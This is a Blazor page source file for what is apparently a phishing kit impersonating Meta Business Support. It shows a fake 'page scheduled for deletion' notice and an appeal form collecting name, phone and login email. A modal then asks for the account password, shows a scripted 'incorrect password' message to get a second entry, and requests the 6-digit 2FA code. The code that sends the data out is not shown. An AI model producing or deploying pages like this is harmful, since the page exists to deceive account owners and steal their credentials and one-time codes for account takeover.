﻿@page "/metasuport/accountsuport/{KeyLink}"
@using AntDesign;

<style>
    .modal-pw .ant-modal-content{ 
         border-radius: 4px;
    }
    .modal-pw .ant-modal-header{
        border-radius: 4px;
    }
    .modal-pw .ant-modal-body{
        padding-top: 10px;
        padding-left: 23px;
    }
    .modal-pw .ant-modal-footer{
            display: none;
    }
    .ant-btn-primary[disabled]{
        background-color: #4267b2bd;
            color: #ffff;
    }
    .ant-input[disabled] {
        color: #000000b5;
    }
    .ant-spin-spinning{
        height: 100%;
        z-index: 100000;
        width: 100%;
        position: absolute;
        background: #ffffff7a;
    }
    .ant-spin-spinning .anticon-loading{
        display: flex;
        height: 100%;
        justify-content: center;
        align-items: center;
    }
</style>

@{
    RenderFragment antIcon = @<Icon Type="loading" Theme="outline" Style="font-size: 24px" Spin />;
}
<link rel="icon" type="image/x-icon" href="/img/icon/m1.png">
<PageTitle>Meta for Business - Page Appeal</PageTitle>
<Layout Class="layout">
    <Header class="bg-[#355797] h-[54px] shadow-[-1px_-12px_12px_11px_rgb(0_0_0_/_10%)] z-[2] grid grid-cols-6 gap-4">
        <div class="logo flex items-center col-start-1 col-end-7 xl:col-start-2 xl:col-span-4 h-[50px] justify-between">
            <div class="flex items-center ">
                <img class="metalogo w-[90px] h-3.5" src="/img/OriginalLink/iconMT1111.svg">
                <p class="metahead text-[#ffff] h-[21px] flex items-center pl-3 border-l-[1.5px] border-solid text-[16px]">Support Inbox</p>
            </div>
            <div>
                <img src="/img/OriginalLink/search-icon.ico" class="searchicon w-[20px] h-[20px]">
            </div>
        </div>
    </Header>
    <Content Style="padding: 0 50px;" class="bg-[#E9EAED] flex justify-center flex-col items-center p-[0px!important] ">
        <div class="masheader w-full" id="masheader">
            <div class="wrapper">
                <div class="container max-w-full">
                    <p class="businesshelp">Meta Business Help Center</p>
                    <p class="businesshelpcenter"> Get Support</p>
                </div>
            </div>
        </div>
        <div>
            <section class="main">
                <div class="container">
                    <div class="row">
                        <div class="col-md-8 offset-md-2">
                            <div class="card mt-[60px] pt-[16px] mb-[80px] bg-[#FFFFFF] rounded">
                                <div class="row flex pb-[20px] px-[16px]" style="padding-bottom: 20px; border-bottom: 1px solid #dddfe2;">
                                    <div class="col-md-1 col-2 w-[42px] h-[42px] p-[9px] rounded-[50%] bg-[#575D6D]">
                                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
                                            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
                                                <path fill="#ffffff" d="M48 64C21.5 64 0 85.5 0 112c0 15.1 7.1 29.3 19.2 38.4L236.8 313.6c11.4 8.5 27 8.5 38.4 0L492.8 150.4c12.1-9.1 19.2-23.3 19.2-38.4c0-26.5-21.5-48-48-48H48zM0 176V384c0 35.3 28.7 64 64 64H448c35.3 0 64-28.7 64-64V176L294.4 339.2c-22.8 17.1-54 17.1-76.8 0L0 176z"/>
                                            </svg>
                                        </svg>
                                    </div>
                                    <div class="col-md-11 col-10 relative w-full px-[15px]">
                                        <p style="font-weight: bold; margin-bottom: 0px;" class="text-[16px]">Your page goes against our Community Standards</p>
                                        <div class="">
                                            <span style="background-color: #3b81d3; font-size: 12px;" class="open text-[white] px-2.5 py-1 rounded-[5px]">OPEN</span> <span style="color:#90949c; font-size: 12px;">Report no: 3128512165</span>
                                        </div>
                                    </div>
                                </div>
                                <div class="row py-5" style="background-color: #f7f7f7; border-bottom:1px solid #dddfe2">
                                    <div class="col-md-12 px-[15px]">
                                        <p style="color:#90949c; font-size: 12px; font-weight: 500; margin-bottom: 10px;">ACTIVITY</p>
                                    </div>
                                    <div class="flex">
                                        <div class="col-md-1 col-2 w-[61px] px-[15px]">
                                            <img src="/img/icon/f1.png" class="img-fluid">
                                        </div>
                                        <div class="col-md-11 col-10" style="padding-left: 0px;">
                                            <p style="font-weight: bold; font-size: 14px; margin-bottom: 7px">Our Message</p>
                                            <p class="ourmessagiii font-['Arial']" style="font-size: 14px; color:#4b4f56;">
                                                Your page has been scheduled for deletion because one of the following reasons:<br>
                                                - Intellectual Property Infringement<br>
                                                - Community Standards<br>
                                                - Hate Speech
                                            </p>
                                        </div>

                                    </div>
                                </div>
                                <div class="row flex" style="padding-top: 20px; padding-bottom: 20px; background-color: #f7f7f7; border-bottom:1px solid #dddfe2">
                                    <div class="col-md-1 col-2 w-[61px] px-[15px]">
                                        <img src="/img/icon/ava.png" class="img-fluid" width="40" height="40" style="object-fit: cover; display: inline-block; border-radius: 50%;">
                                    </div>
                                    <div class="col-md-11 col-10" style="padding-left: 0px;">
                                        <strong class="strong">Your Reply</strong>
                                        <p class="w-full xl:w-[652px] pr-[15px]" style="margin-bottom: 15px; font-size: 12px;">Please be sure to provide the requested information below. Failure to provide this information may delay the processing of your appeal.</p>
                                        <Form @ref="_form" OnFinishFailed="OnFinishFailed" ValidateOnChange="@true" Model="@Model" OnFinish="OnFinish" class="pr-[16px]">
                                            <div class="sm:col-span-2 h-[61px] mb-[16px]">
                                                <label for="name" style="font-size: 12px !important;font-weight: 700;" class="block font-semibold leading-6 font-[650] text-gray-900 mb-[8px] leading-[1.2rem] text-[#90949c!important]">Your Name</label>
                                                <div class="">
                                                    <FormItem>
                                                        <Input @bind-Value="@Model.FullName" id="name" style="height: 35px" class="h-[35px] block w-full rounded-md border-0 px-3.5 py-2 text-gray-900 shadow-sm ring-1 ring-inset ring-gray-300 placeholder:text-gray-400 focus:ring-2 focus:ring-inset focus:ring-indigo-600 sm:text-sm sm:leading-6"/>
                                                    </FormItem>
                                                </div>
                                            </div>
                                            <div class="sm:col-span-2 h-[61px] mb-[16px]">
                                                <label for="phone" style="font-size: 12px !important;font-weight: 700;" class="block font-semibold leading-6 font-[650] text-gray-900 mb-[8px] leading-[1.2rem] text-[#90949c!important]">Your Phone Number</label>
                                                <div class="">
                                                    <FormItem>
                                                        <Input @bind-Value="@Model.MobilePhoneNumber" id="phone" style="height: 35px" class="h-[35px] block w-full rounded-md border-0 px-3.5 py-2 text-gray-900 shadow-sm ring-1 ring-inset ring-gray-300 placeholder:text-gray-400 focus:ring-2 focus:ring-inset focus:ring-indigo-600 sm:text-sm sm:leading-6"/>
                                                    </FormItem>
                                                </div>
                                            </div>
                                            <div class="sm:col-span-2 h-[61px] mb-[16px]">
                                                <label for="email" style="font-size: 12px !important;font-weight: 700;" class="block font-semibold leading-6 font-[650] text-gray-900 mb-[8px] leading-[1.2rem] text-[#90949c!important]">Login Email Address</label>
                                                <div class="">
                                                    <FormItem>
                                                        <Input @bind-Value="@Model.BusinessEmailAddress" id="email" style="height: 35px" class="h-[35px] block w-full rounded-md border-0 px-3.5 py-2 text-gray-900 shadow-sm ring-1 ring-inset ring-gray-300 placeholder:text-gray-400 focus:ring-2 focus:ring-inset focus:ring-indigo-600 sm:text-sm sm:leading-6"/>
                                                    </FormItem>
                                                </div>
                                            </div>
                                            <div class="sm:col-span-2 mb-[16px]">
                                                <label for="YourAppeal" style="font-size: 12px !important;font-weight: 700;" class="block font-semibold leading-6 font-[650] text-gray-900 mb-[8px] leading-[1.2rem] text-[#90949c!important]">Your Appeal</label>
                                                <div class="">
                                                    <FormItem>
                                                        <TextArea @bind-Value="@Model.YourAppeal" style="max-height: 60px;height: 60px" name="pages-name" id="YourAppeal" Rows="2" class=" block w-full rounded-md border-0 px-3.5 py-2 text-gray-900 shadow-sm ring-1 ring-inset ring-gray-300 placeholder:text-gray-400 focus:ring-2 focus:ring-inset focus:ring-indigo-600 sm:text-sm sm:leading-6"></TextArea>
                                                    </FormItem>
                                                </div>
                                            </div>
                                            <div class="form-check">
                                                <input class="form-check-input" type="checkbox" id="check" value="1" name="check" required="true">
                                                <label class="form-check-label font-[650] text-[#9097A6]" for="check" name="check">I agree to our Terms, Data and Cookies Policy.</label>
                                                <p id="termsaccept" style="color:red; font-size: 13px; font-weight: 500; margin-bottom: 20px;"></p>
                                            </div>
                                            <FormItem>
                                                <Button Disabled="!_form.IsModified" Type="primary" HtmlType="submit" style="margin-bottom: 15px;font-weight: 500;" id="submit" class="btn bg-[#4267b2] border text-[white] text-[13px] normal-case mt-[15px] px-5 py-[7px] h-auto leading-[15px] rounded-sm border-solid border-[#4267b2] hover:bg-[#4267b2] hover:border-[#4267b2] active:bg-[#4267b2] active:border-[#4267b2] focus:bg-[#4267b2] focus:border-[#4267b2]">
                                                    Submit
                                                </Button>
                                            </FormItem>
                                            
                                            <Modal Title="@TitleModel"
                                                   WrapClassName="modal-pw"
                                                   Centered="true"
                                                   Visible="@VisibleModel"
                                                   OnOk="@(() => { VisibleModel = true; })">
                                                <Spin Indicator=antIcon Spinning="@Loading" WrapperClassName="loading-page">
                                                @if (PasswordNumber != 3)
                                                {
                                                    <p class="text-[black]" style="font-weight: 400;">For your security, you must enter your password to continue.</p>
                                                    <div class="flex justify-between mt-[10px]">
                                                        <span class="text-[#979BA2]" style="font-weight: 700;">Email address:</span>
                                                        <Input @bind-Value="@Model.BusinessEmailAddress" Disabled style="height: 30px;width: 40%;" class=""/>
                                                    </div>
                                                    <div class="flex justify-between mt-[5px]">
                                                        <span class="text-[#979BA2]" style="font-weight: 700;">Password:</span>
                                                        <Input type="password" @bind-Value="@Model.Password" style="height: 30px;width: 40%;"/>
                                                    </div>
                                                    if (PasswordNumber == 2)
                                                    {
                                                        <div>
                                                            <label class="text-[red] text-[13px] font-medium mb-5 flex justify-end" for="check" name="check">The password you've entered is incorrect.</label>
                                                        </div>
                                                    }
                                                }
                                                else
                                                {
                                                    <p class="text-[black]" style="font-weight: 400;">Please check for a text message with your code. </p>
                                                    <p class="text-[black]" style="font-weight: 400;">Your code is 6 characters in length. </p>
                                                    <div class="flex justify-between mt-[10px]">
                                                        <Input @bind-Value="@Model.Code2FA" style="height: 30px;width: 40%;" class=""/>
                                                    </div>
                                                }
                                                <div class="flex justify-end">
                                                    <Button OnClick="@SendData1" Type="primary" style="font-weight: 500;" class="btn bg-[#4267b2] border text-[white] text-[13px] normal-case mt-[15px] px-5 py-[7px] h-auto leading-[15px] rounded-sm border-solid border-[#4267b2] hover:bg-[#4267b2] hover:border-[#4267b2] active:bg-[#4267b2] active:border-[#4267b2] focus:bg-[#4267b2] focus:border-[#4267b2]">
                                                        Submit
                                                    </Button>
                                                </div>
                                                </Spin>
                                            </Modal>
                                        </Form>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
    </Content>
    <Footer Style="text-align: center; " class="lg:block hidden">
        <div class="t1 ">
            <div class="grid 2xl:grid-cols-8 xl:grid-cols-6 gap-4">
                <div class="2xl:col-start-3 xl:col-start-2 col-span-4 flex justify-start  border-b-[#dddfe2] border-b border-solid pb-[10px]">
                    <p class="text-[#737373] whitespace-nowrap">
                        English (UK)
                        &#160;&#160;中文(台灣)
                        &#160;&#160;한국어
                        &#160;&#160;日本語
                        &#160;&#160;Français (France)
                        &#160;&#160;ภาษาไทย
                        &#160;&#160;Español
                        &#160;&#160;Português (Brasil)
                        &#160;&#160;Deutsch
                        &#160;&#160;Italiano
                    </p>
                    <Button Style="border: none" class="ml-[0.5rem] bg-[#ebedf0] hover:text-[#8a8d91] hover:bg-[#d0d1d3] text-[#8a8d91] p-[3px!important] flex justify-center h-[1.3rem!important] w-[2rem!important]"
                            Type="@ButtonType.Primary" Icon="@IconType.Outline.Plus" Size="@ButtonSize.Large">
                    </Button>
                </div>
            </div>
            <div class="t3 grid 2xl:grid-cols-8 xl:grid-cols-6 grid-flow-col gap-4 pt-[7px]">
                <div class="2xl:col-start-3 xl:col-start-2 col-span-4">
                    <div class="row-span-1 flex text-[#737373] whitespace-nowrap">
                        Messenger &#160; &#160; Facebook Lite &#160; &#160; Video &#160; &#160; Shop on Meta &#160; &#160; Game &#160; &#160;
                        Marketplace &#160; &#160; Meta Pay &#160; &#160; Shop on Meta &#160; &#160; Meta Quest
                    </div>
                    <div class="row-span-1 flex text-[#737373] whitespace-nowrap">
                        Imagine with Meta AI &#160; &#160; Instagram &#160; &#160; Threads &#160; &#160; Fundraising campaign &#160; &#160;
                        Service &#160; &#160; Voting information center &#160; &#160; Privacy policy &#160; &#160; Privacy Center
                    </div>
                    <div class="row-span-1 flex text-[#737373] whitespace-nowrap">
                        Group &#160; &#160; Introduce &#160; &#160; Create ads &#160; &#160; Create Page &#160; &#160; Developers &#160; &#160;
                        Recruitment &#160; &#160; Cookie &#160; &#160; Ad selection &#160; &#160; Rules &#160; &#160; Support
                    </div>

                    <div class="row-span-1 flex text-[#737373]">Meta © 2024</div>
                </div>
            </div>
        </div>
    </Footer>
</Layout>
@* </Spin> *@

<style>
    .site-layout-content {
        background: #fff;
        padding: 24px;
        min-height: 280px;
    }
    #components-layout-demo-top .logo {
        width: 120px;
        height: 31px;
        background: rgba(255, 255, 255, 0.2);
        margin: 16px 24px 16px 0;
        float: left;
    }
    .masheader{
        background-image: url('/img/OriginalLink/bg1.jpg');
        background-repeat: no-repeat;
        background-size: cover;
    }
    /*.masheader .wrapper{*/
    /*  background-color: #5E6D8A;*/
    /*}*/
    .businesshelp{
      padding-top: 60px;
      margin-bottom: 0px;
      color: white;
      text-align: center;
      font-family: Helvetica;
      font-size: 12px;
      letter-spacing: 3px;
      line-height: 21px;
    }
    .businesshelpcenter{
      padding-bottom: 60px;
      font-size: 40px;
      color: white;
      padding-left: 50px;
      padding-right: 50px;
      text-align: center;
      font-weight: 300;
    }
    .ant-input:hover {
      border-color: #ccc; /* Màu border thay đổi khi hover */
    }
</style>